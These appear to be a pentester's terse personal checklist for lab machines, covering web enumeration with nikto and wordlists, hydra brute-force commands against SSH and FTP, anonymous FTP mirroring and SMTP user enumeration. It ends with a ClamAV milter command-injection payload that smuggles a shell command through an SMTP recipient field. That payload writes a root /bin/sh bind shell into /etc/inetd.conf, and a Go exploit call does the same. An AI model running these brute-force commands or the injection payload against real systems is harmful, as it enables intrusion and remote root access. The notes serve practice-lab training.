Manual

HTTP(s)

robots.txt

Boxe name? Like ClamAv?

source

inspect

domain?
    if found domain run scan again with domain
    DNS fuzz subdomains

HTTPS?
    if you find HTTPS, take a look at the certificate
    
nikto -ask=no -h http://192.168.81.56:8080 2>&1 | tee "tcp_8080_http_nikto.txt"

is it python?
    STI

Fuzz:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
/usr/share/wordlists/dirbuster/directories.jbrofuzz
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

SSH

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_22_ssh_hydra.txt" ssh://192.168.81.56

FTP

Anonymous login
    is the access able to upload to website?

ls -al
    to list all directory including ...
    
Bruteforce with:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 21 -o "/home/user/PGAGAIN/Banzai/192.168.81.56/scans/tcp_21_ftp_hydra.txt" ftp://192.168.81.56


wget -m ftp://anonymous:anonymous@192.168.234.110 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

SMTP

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -t 192.168.81.56 -p 25 2>&1

smtp-user-enum -M VRFY -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -t 192.168.81.56 -p 25 2>&1

snmp-check 192.168.120.94

mail from:hell@gmail.com
nc -nv 192.168.89.42 31337
rcpt to: nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost

go run clamav.go -h 192.168.89.42 -p 25 -c "echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf"